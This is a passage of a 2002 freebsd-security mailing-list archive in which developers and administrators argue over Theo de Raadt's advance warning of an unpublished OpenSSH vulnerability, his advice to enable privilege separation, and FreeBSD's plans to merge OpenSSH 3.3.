Vidrine" , freebsd-security@FreeBSD.ORG Subject: Re: Hogwash References: <200206250111.g5P1BVLJ015666@cvs.openbsd.org> From: Ted Cabeen Date: 24 Jun 2002 19:00:13 -0700 In-Reply-To: Theo de Raadt's message of "Mon, 24 Jun 2002 19:11:30 -0600" Message-ID: <87sn3c6rte.fsf@gray.impulse.net> Lines: 37 User-Agent: Gnus/5.0807 (Gnus v5.8.7) XEmacs/21.1 (Cuyahoga Valley) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Theo de Raadt writes: > > I don't disagree that leaks happen. That's Just the Way It Is. > > Not this time. > > > I'd > > rather we had the information now to make wise choices about what to > > do with deployed systems, custom hacks, and older-but-still-supported > > releases --- knowing there is a possibility for `leakage' that grows > > with time. > > Ask your vendor. And ask them to read the following (which I am > re-posting since people appear not to have read it carefully enough), > where I lay out very very very clearly what your choices and your > vendor's choices are. If you don't like those choices, turn it off. > What more do you expect? Ice cream and a pat on the head? You've > never had it better! You get a warning days and days in advance, with > no leak, and you shoot the messenger! Bang! As I said: Hogwash. I for one, appreciate the early notification. It allows me to upgrade or firewall important machines. That said, the initial warning was a little vague. Something that was clearer yet still provided little information to the blackhats would have been better. In particular, I would have liked a more clear statement of the severity of the problem. From the original email it's not clear if the vulnerability is root or user level, and whether or not it has been successfully exploited yet. Of course, it's possible that when the message was written, that wasn't known yet, and if so then fine. Regardless, I hope that you will post further updates as you learn more about the extent of the problem. -- Ted Cabeen http://www.pobox.com/~secabeen ted@impulse.net Check Website or Keyserver for PGP/GPG Key BA0349D2 secabeen@pobox.com "I have taken all knowledge to be my province." -F. Bacon secabeen@cabeen.org "Human kind cannot bear very much reality."-T.S.Eliot cabeen@netcom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 19: 2:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from cvs.openbsd.org (cvs.openbsd.org [199.185.137.3]) by hub.freebsd.org (Postfix) with ESMTP id 1AF6337B403; Mon, 24 Jun 2002 19:02:26 -0700 (PDT) Received: from cvs.openbsd.org (deraadt@localhost [127.0.0.1]) by cvs.openbsd.org (8.12.4/8.12.1) with ESMTP id g5P238LJ002003; Mon, 24 Jun 2002 20:03:08 -0600 (MDT) Message-Id: <200206250203.g5P238LJ002003@cvs.openbsd.org> To: Ted Cabeen Cc: "Jacques A. Vidrine" , freebsd-security@FreeBSD.ORG Subject: Re: Hogwash In-reply-to: Your message of "24 Jun 2002 19:00:13 PDT." <87sn3c6rte.fsf@gray.impulse.net> Date: Mon, 24 Jun 2002 20:03:08 -0600 From: Theo de Raadt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > I for one, appreciate the early notification. It allows me to upgrade > or firewall important machines. That said, the initial warning was a > little vague. Something that was clearer yet still provided little > information to the blackhats would have been better. In particular, I > would have liked a more clear statement of the severity of the > problem. From the original email it's not clear if the vulnerability > is root or user level, and whether or not it has been successfully > exploited yet. Of course, it's possible that when the message was > written, that wasn't known yet, and if so then fine. Regardless, I > hope that you will post further updates as you learn more about the > extent of the problem. I'm not giving away any hints. Assume the worst and do the upgrade, and if you dislike the way I handled this, don't buy me that beer later. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 19: 2:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from d188h80.mcb.uconn.edu (d188h80.mcb.uconn.edu [137.99.188.80]) by hub.freebsd.org (Postfix) with SMTP id 8CB1737B400 for ; Mon, 24 Jun 2002 19:02:30 -0700 (PDT) Received: (qmail 92208 invoked by uid 1001); 25 Jun 2002 02:02:29 -0000 Date: Mon, 24 Jun 2002 22:02:29 -0400 From: "Peter C. Lai" To: Chris BeHanna Cc: FreeBSD Security , deraadt@cvs.openbsd.org Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) Message-ID: <20020624220229.A92101@cowbert.2y.net> Reply-To: peter.lai@uconn.edu References: <20020624163538.H10398-100000@yez.hyperreal.org> <20020624212557.R7245-100000@topperwein.dyndns.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020624212557.R7245-100000@topperwein.dyndns.org>; from behanna@zbzoom.net on Mon, Jun 24, 2002 at 09:35:06PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Is OpenSSH 3.3 now part of the base system? So are we phasing out ssh as part of the base system (since the answer to the first question is no, and therefore only the portable versions have privsep available)? Again, we don't know if older versions of ssh are vulnerable or not. I suppose this notice is great for those on the bleeding edge, but doesn't help the rest of the majority of users, who probably *aren't* running 3.3. The freebsd security-officer tries to help the general cross-section of the users, not just the few who run the latest and greatest. On Mon, Jun 24, 2002 at 09:35:06PM -0400, Chris BeHanna wrote: > Although I sympathize with the desire to be able to make informed > decisions regarding older versions of supported software that's in the > field, I have to say that I side with Theo here: We're being warned that > a critical exploit will be published in a few days, along with the > simultaneous release of a version of the software that fixes the bug > that leads to the exploit, AND we're being told how to immunize > ourselves against the exploit--using currently-available > software--several days in advance of the announcement. > > Result: it's possible to completely prevent the window of > vulnerability that usually exists between the announcement of an > exploit and the availability of a fix for same. Any other way > *guarantees* that there will be a leak prior to the bugfix release, > causing more than a few folks to get burned by the exploit before they > get a chance to read their mail and learn how to enable the workaround. > In a perfect world, Theo could publicize the exploit without fear of > it being used to burn people prior to their learning how to use the > workaround. But in a perfect world, we wouldn't need OpenSSH. > > Thank you, Theo. > > -- > Chris BeHanna > Software Engineer (Remove "bogus" before responding.) > behanna@bogus.zbzoom.net > Turning coffee into software since 1990. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Peter C. Lai University of Connecticut Dept. of Molecular and Cell Biology | Undergraduate Research Assistant http://cowbert.2y.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 19: 7:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 61C8437B404; Mon, 24 Jun 2002 19:06:31 -0700 (PDT) Received: (from brett@localhost) by lariat.org (8.9.3/8.9.3) id UAA11075; Mon, 24 Jun 2002 20:06:27 -0600 (MDT) Date: Mon, 24 Jun 2002 20:06:27 -0600 (MDT) From: Brett Glass Message-Id: <200206250206.UAA11075@lariat.org> To: dinoex@freebsd.org, nectar@freebsd.org, piechota@argolis.org Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) Cc: freebsd-security@freebsd.org In-Reply-To: <20020624224841.GC42982@madman.nectar.cc> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Theo has made it quite clear both in his announcement and in private mail: Anyone who wants to be safe MUST get a version of OpenSSH with "privilege separation" running before next week. The latest version in the Ports tree appears to be 3.3p1, while the packages are older. Theo recommends 3.3.1p, so we should make sure that this version is available both as a port and as a binary package by week's end. I doubt that this will be hard to do, since FreeBSD is very close to OpenBSD and NetBSD API-wise. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 19:18:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 11D3437B403 for ; Mon, 24 Jun 2002 19:18:25 -0700 (PDT) Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.12.3/8.12.3) with SMTP id g5P2IJw6048632; Mon, 24 Jun 2002 22:18:19 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Mon, 24 Jun 2002 22:18:19 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: peter.lai@uconn.edu Cc: Chris BeHanna , FreeBSD Security , deraadt@cvs.openbsd.org Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) In-Reply-To: <20020624220229.A92101@cowbert.2y.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org We're in the process of merging OpenSSH 3.3 into -CURRENT, and will do the same for -STABLE shortly as well. In order to do this and maintain PAM support, we'll be jumping from the base OpenSSH distribution to the OpenSSH-portable distribution, which includes support for PAM (as PAM is not used in OpenBSD). Because 5.0-CURRENT uses OpenPAM rather than Linux-PAM, we'll need to do a little testing and make sure the adaptation works properly in combination with Privilege Seperation. You should see commit messages from this merge-work over the next couple of days. It's not yet clear how we should handle OpenSSH and the various RELENG_4_X branches; it might depend a bit on the complexity of the merge work and the nature of the vulnerability once vulnerability information is published. Typically for patch levels on released versions, we've adopted a highly conservative approach for security bug fixes, avoiding complex and risky changes and leaning in a more minimal direction. Obviously which way we go on that one will depend on the nature of the vulnerability. Robert N M Watson FreeBSD Core Team, TrustedBSD Projects robert@fledge.watson.org Network Associates Laboratories On Mon, 24 Jun 2002, Peter C. Lai wrote: > Is OpenSSH 3.3 now part of the base system? So are we phasing out > ssh as part of the base system (since the answer to the first > question is no, and therefore only the portable versions > have privsep available)? Again, we don't know if > older versions of ssh are vulnerable or not. I suppose > this notice is great for those on the bleeding edge, but > doesn't help the rest of the majority of users, who probably > *aren't* running 3.3. The freebsd security-officer tries > to help the general cross-section of the users, not just > the few who run the latest and greatest. > > On Mon, Jun 24, 2002 at 09:35:06PM -0400, Chris BeHanna wrote: > > Although I sympathize with the desire to be able to make informed > > decisions regarding older versions of supported software that's in the > > field, I have to say that I side with Theo here: We're being warned that > > a critical exploit will be published in a few days, along with the > > simultaneous release of a version of the software that fixes the bug > > that leads to the exploit, AND we're being told how to immunize > > ourselves against the exploit--using currently-available > > software--several days in advance of the announcement. > > > > Result: it's possible to completely prevent the window of > > vulnerability that usually exists between the announcement of an > > exploit and the availability of a fix for same. Any other way > > *guarantees* that there will be a leak prior to the bugfix release, > > causing more than a few folks to get burned by the exploit before they > > get a chance to read their mail and learn how to enable the workaround. > > In a perfect world, Theo could publicize the exploit without fear of > > it being used to burn people prior to their learning how to use the > > workaround. But in a perfect world, we wouldn't need OpenSSH. > > > > Thank you, Theo. > > > > -- > > Chris BeHanna > > Software Engineer (Remove "bogus" before responding.) > > behanna@bogus.zbzoom.net > > Turning coffee into software since 1990. > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > -- > Peter C. Lai > University of Connecticut > Dept. of Molecular and Cell Biology | Undergraduate Research Assistant > http://cowbert.2y.net/ > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 19:22:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from lucubration.notgod.com (node-216-136-154-51.networks.paypal.com [216.136.154.51]) by hub.freebsd.org (Postfix) with SMTP id 5D80537B40A for ; Mon, 24 Jun 2002 19:22:15 -0700 (PDT) Received: (qmail 34400 invoked from network); 25 Jun 2002 02:22:34 -0000 Received: from unknown (HELO notgod.com) (64.168.159.218) by node-216-136-154-51.networks.paypal.com with SMTP; 25 Jun 2002 02:22:33 -0000 Message-ID: <3D17D3BE.8010803@notgod.com> Date: Mon, 24 Jun 2002 19:21:50 -0700 From: Brian Nelson User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020606 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Theo de Raadt Cc: Jason Stone , FreeBSD Security Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability References: <200206250156.g5P1upLJ029822@cvs.openbsd.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Level: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Theo de Raadt wrote: > Jason is begging that I release a patch tomorrow. What do you the > rest of you think? Do you wish to be immunized first or should we > just post a patch, and have a public exploit a day later? Just tossing an idea out (that I am sure a great number of you will not like)... How about working with the OS security officer (and whoever else) to release a binary SSHD (PGP/GPG signed by the SA's of the OS's), but not have the patches committed into public view (CVS, etc) until you feel it's the rigt time to release the specifics... I would think this would minimize exposure while allowing people to secure their machines... Of course, this assumes that you (and other people) trust the SO's not to use and/or publish the information without your permission... maybe copywriting the source (like the OpenBSD iso) and then you can manage the permissions on the source patch... and release the rights on the patch when the moon aligns with Orion's belt.... -Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 19:24:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from cvs.openbsd.org (cvs.openbsd.org [199.185.137.3]) by hub.freebsd.org (Postfix) with ESMTP id 8A85737B41C for ; Mon, 24 Jun 2002 19:24:18 -0700 (PDT) Received: from cvs.openbsd.org (deraadt@localhost [127.0.0.1]) by cvs.openbsd.org (8.12.4/8.12.1) with ESMTP id g5P2P1LI012658; Mon, 24 Jun 2002 20:25:01 -0600 (MDT) Message-Id: <200206250225.g5P2P1LI012658@cvs.openbsd.org> To: Brian Nelson Cc: Jason Stone , FreeBSD Security Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability In-reply-to: Your message of "Mon, 24 Jun 2002 19:21:50 PDT." <3D17D3BE.8010803@notgod.com> Date: Mon, 24 Jun 2002 20:25:01 -0600 From: Theo de Raadt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Do not let this man drive. > From: Brian Nelson > User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020606 > X-Accept-Language: en-us, en > MIME-Version: 1.0 > To: Theo de Raadt > CC: Jason Stone , > FreeBSD Security > > Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability > References: <200206250156.g5P1upLJ029822@cvs.openbsd.org> > Content-Type: text/plain; charset=us-ascii; format=flowed > Content-Transfer-Encoding: 7bit > X-Spam-Level: > > Theo de Raadt wrote: > > > Jason is begging that I release a patch tomorrow. What do you the > > rest of you think? Do you wish to be immunized first or should we > > just post a patch, and have a public exploit a day later? > > Just tossing an idea out (that I am sure a great number of you will not > like)... > > How about working with the OS security officer (and whoever else) to > release a binary SSHD (PGP/GPG signed by the SA's of the OS's), but not > have the patches committed into public view (CVS, etc) until you feel > it's the rigt time to release the specifics... I would think this would > minimize exposure while allowing people to secure their machines... > > Of course, this assumes that you (and other people) trust the SO's not > to use and/or publish the information without your permission... maybe > copywriting the source (like the OpenBSD iso) and then you can manage > the permissions on the source patch... and release the rights on the > patch when the moon aligns with Orion's belt.... > > -Brian > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 19:28:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id E81E237B400 for ; Mon, 24 Jun 2002 19:28:35 -0700 (PDT) Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.12.3/8.12.3) with SMTP id g5P2SWw6048861; Mon, 24 Jun 2002 22:28:32 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Mon, 24 Jun 2002 22:28:32 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Brian Nelson Cc: Theo de Raadt , Jason Stone , FreeBSD Security Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability In-Reply-To: <3D17D3BE.8010803@notgod.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 24 Jun 2002, Brian Nelson wrote: > Theo de Raadt wrote: > > > Jason is begging that I release a patch tomorrow. What do you the > > rest of you think? Do you wish to be immunized first or should we > > just post a patch, and have a public exploit a day later? > > Just tossing an idea out (that I am sure a great number of you will not > like)... > > How about working with the OS security officer (and whoever else) to > release a binary SSHD (PGP/GPG signed by the SA's of the OS's), but not > have the patches committed into public view (CVS, etc) until you feel > it's the rigt time to release the specifics... I would think this would > minimize exposure while allowing people to secure their machines... > > Of course, this assumes that you (and other people) trust the SO's not > to use and/or publish the information without your permission... maybe > copywriting the source (like the OpenBSD iso) and then you can manage > the permissions on the source patch... and release the rights on the > patch when the moon aligns with Orion's belt.... There have been a number of noted botches relating to this approach in the past -- several organizations (formal and informal) have attempted to coordinate advisory release and containment of information relating to vulnerabilities, and often some combination of {accidental leakage, early release (oops wrong button, didn't read the date), etc, ...} occurs. Obviously, we can agree with Theo or not about the approach that is being adopted this time through, but I think it probably is naive to assume that tightly controlling the information flow under the current circumstances is entirely feasible with larger sets of operating systems and security officers involved. Robert N M Watson FreeBSD Core Team, TrustedBSD Projects robert@fledge.watson.org Network Associates Laboratories To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 19:33:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 1488637B401 for ; Mon, 24 Jun 2002 19:33:13 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (localhost [IPv6:::1]) by khavrinen.lcs.mit.edu (8.12.3/8.12.3) with ESMTP id g5P2XCDK009483; Mon, 24 Jun 2002 22:33:12 -0400 (EDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.12.3/8.12.3/Submit) id g5P2XBZi009480; Mon, 24 Jun 2002 22:33:11 -0400 (EDT) (envelope-from wollman) Date: Mon, 24 Jun 2002 22:33:11 -0400 (EDT) From: Garrett Wollman Message-Id: <200206250233.g5P2XBZi009480@khavrinen.lcs.mit.edu> To: Chris BeHanna Cc: FreeBSD Security Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) In-Reply-To: <20020624212557.R7245-100000@topperwein.dyndns.org> References: <20020624163538.H10398-100000@yez.hyperreal.org> <20020624212557.R7245-100000@topperwein.dyndns.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org < said: > Result: it's possible to completely prevent the window of > vulnerability that usually exists between the announcement of an > exploit and the availability of a fix for same. Only if you run absolutely stock, bog-standard OpenSSH. Many of us have different operational requirements. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 19:33:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from test.nicholstechnology.com (dsl-64-130-106-125.telocity.com [64.130.106.125]) by hub.freebsd.org (Postfix) with ESMTP id 9B98B37B403 for ; Mon, 24 Jun 2002 19:33:33 -0700 (PDT) Received: by TEST with Internet Mail Service (5.5.2655.55) id ; Mon, 24 Jun 2002 21:33:46 -0500 Message-ID: <613AEE93ED4FD6118DED00A00CC04CB648C0@TEST> From: simon To: "'freebsd-security@freebsd.org'" Subject: unsubscribe freebsd-security Date: Mon, 24 Jun 2002 21:33:42 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2655.55) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C21BF0.B89B9460" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C21BF0.B89B9460 Content-Type: text/plain unsubscribe freebsd-security ------_=_NextPart_001_01C21BF0.B89B9460 Content-Type: text/html unsubscribe freebsd-security

unsubscribe freebsd-security

------_=_NextPart_001_01C21BF0.B89B9460-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 19:39:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id 7202C37B409 for ; Mon, 24 Jun 2002 19:39:30 -0700 (PDT) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id MAA08243; Tue, 25 Jun 2002 12:39:25 +1000 (EST) From: Darren Reed Message-Id: <200206250239.MAA08243@caligula.anu.edu.au> Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) To: wollman@lcs.mit.edu (Garrett Wollman) Date: Tue, 25 Jun 2002 12:39:25 +1000 (Australia/ACT) Cc: security@freebsd.org In-Reply-To: <200206250233.g5P2XBZi009480@khavrinen.lcs.mit.edu> from "Garrett Wollman" at Jun 24, 2002 10:33:11 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Is the ssh.com version of ssh/sshd available as a port ? Well, for non-commercial users, that is. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 19:42:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id 1BA1537B403; Mon, 24 Jun 2002 19:42:32 -0700 (PDT) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id MAA08539; Tue, 25 Jun 2002 12:42:28 +1000 (EST) From: Darren Reed Message-Id: <200206250242.MAA08539@caligula.anu.edu.au> Subject: Re: Hogwash To: deraadt@cvs.openbsd.org (Theo de Raadt) Date: Tue, 25 Jun 2002 12:42:28 +1000 (Australia/ACT) Cc: nectar@FreeBSD.ORG (Jacques A. Vidrine), freebsd-security@FreeBSD.ORG In-Reply-To: <200206250146.g5P1kXLI030924@cvs.openbsd.org> from "Theo de Raadt" at Jun 24, 2002 07:46:33 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In some mail from Theo de Raadt, sie said: > > > What I like least about this new bug is that the workaround is to use > > a new feature called "Priviledge Separation". Maybe it wouldn't have > > mattered what the "next new bug" was, this would just have been one > > defence. The timing is quite ironic. > > Yes, and you know all about ironic timing > > > The paranoia in me is screaming to resist and I can't help but ponder, > > does enabling priviledge separation disable the exploit or does it just > > limit it to the userid sshd runs as in this mode ? > > Darren, resist enabling privsep. I cannot find strong enough enough > words in urging you. > > > Can an attacker still get a remote shell (just not root) if priviledge > > separation is enabled ? > > Duh. If that's the case then I think I'll just turn off openssh(d) until I can secure it properly, when the patch is released. I'd like to recommend others do the same but that'll depend on your networks and whether they can live without that sort of remote access for a week or so. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 19:44:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 5EEDA37B40D for ; Mon, 24 Jun 2002 19:44:02 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id A7A964C; Mon, 24 Jun 2002 21:44:01 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5P2i1iD043808; Mon, 24 Jun 2002 21:44:01 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5P2i1uR043807; Mon, 24 Jun 2002 21:44:01 -0500 (CDT) Date: Mon, 24 Jun 2002 21:44:01 -0500 From: "Jacques A. Vidrine" To: Theo de Raadt Cc: freebsd-security@FreeBSD.ORG Subject: Re: Hogwash Message-ID: <20020625024401.GB43738@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Theo de Raadt , freebsd-security@FreeBSD.ORG References: <20020625010643.GC43386@madman.nectar.cc> <200206250111.g5P1BVLJ015666@cvs.openbsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206250111.g5P1BVLJ015666@cvs.openbsd.org> User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jun 24, 2002 at 07:11:30PM -0600, Theo de Raadt wrote: > > I'd > > rather we had the information now to make wise choices about what to > > do with deployed systems, custom hacks, and older-but-still-supported > > releases --- knowing there is a possibility for `leakage' that grows > > with time. > > Ask your vendor. I _am_ the vendor. -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 19:47:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from cvs.openbsd.org (cvs.openbsd.org [199.185.137.3]) by hub.freebsd.org (Postfix) with ESMTP id 3CBA737B401; Mon, 24 Jun 2002 19:47:36 -0700 (PDT) Received: from cvs.openbsd.org (deraadt@localhost [127.0.0.1]) by cvs.openbsd.org (8.12.4/8.12.1) with ESMTP id g5P2mJLJ031907; Mon, 24 Jun 2002 20:48:19 -0600 (MDT) Message-Id: <200206250248.g5P2mJLJ031907@cvs.openbsd.org> To: "Jacques A. Vidrine" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Hogwash In-reply-to: Your message of "Mon, 24 Jun 2002 21:44:01 CDT." <20020625024401.GB43738@madman.nectar.cc> Date: Mon, 24 Jun 2002 20:48:19 -0600 From: Theo de Raadt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > On Mon, Jun 24, 2002 at 07:11:30PM -0600, Theo de Raadt wrote: > > > I'd > > > rather we had the information now to make wise choices about what to > > > do with deployed systems, custom hacks, and older-but-still-supported > > > releases --- knowing there is a possibility for `leakage' that grows > > > with time. > > > > Ask your vendor. > > I _am_ the vendor. And you have been told how to immunize. You are not being told more. Nor are IBM, Apple, HP, SGI, Sun, any of the Linux distributions, the other BSD's, or any of the other misc embedded systems that use the code. But they are all being told how to immunize. If it works, it works. But I am not telling 30 people. Someone in FreeBSD please explain this to him. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 19:49:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from nexusxi.com (balistraria.nexusxi.com [216.123.202.196]) by hub.freebsd.org (Postfix) with SMTP id 9ED2A37B404 for ; Mon, 24 Jun 2002 19:49:37 -0700 (PDT) Received: (qmail 6001 invoked by uid 1000); 25 Jun 2002 02:49:31 -0000 Date: Mon, 24 Jun 2002 20:49:31 -0600 From: "Dalin S. Owen" To: Darren Reed Cc: freebsd-security@freebsd.org Subject: Re: Hogwash Message-ID: <20020624204931.A5883@nexusxi.com> References: <200206250146.g5P1kXLI030924@cvs.openbsd.org> <200206250242.MAA08539@caligula.anu.edu.au> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="mYCpIKhGyMATD0i+" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200206250242.MAA08539@caligula.anu.edu.au>; from avalon@coombs.anu.edu.au on Tue, Jun 25, 2002 at 12:42:28PM +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: 